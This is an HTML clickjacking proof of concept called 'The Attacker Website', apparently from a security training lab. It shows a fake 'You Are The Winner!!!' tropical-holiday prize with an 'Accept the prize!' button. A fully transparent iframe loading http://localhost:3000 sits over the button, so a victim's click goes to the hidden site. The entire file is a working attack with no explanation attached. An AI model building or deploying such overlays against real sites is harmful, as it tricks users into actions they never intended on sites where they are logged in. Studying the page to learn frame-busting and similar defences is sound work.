<html lang=en>
  <head>
    <meta charset=utf-8>
    <title>The Attacker Website</title>
    <link rel="stylesheet" type="text/css" href="css/tacit-css.min.css"/>
    <style>
      #vulnerable_website {
        position:relative;
        opacity:0.0;
        width:800px;
        height:900px;
        top:75px;
        left: -95px;
        z-index:2;
        padding-left:80px;
        }
       
      #attacker_website {
        position:absolute;
        z-index:1;
        }
      #attacker_website button {
        margin-left:100px;
      }
    </style>
  </head>
  <body>
    <div id="attacker_website">
      <h1>You Are The Winner!!!</h1>
      <h2>You won an awesome tropics holiday!</h2>
      <img alt="Tropical Holiday" src="images/tropical-holiday.jpg">
      <h2>Accept it by clicking the button below.</h2>
      <button type="submit">Accept the prize!</button>
    </div>      

    <iframe id="vulnerable_website" src="http://localhost:3000">
    </iframe>

  </body>
</html>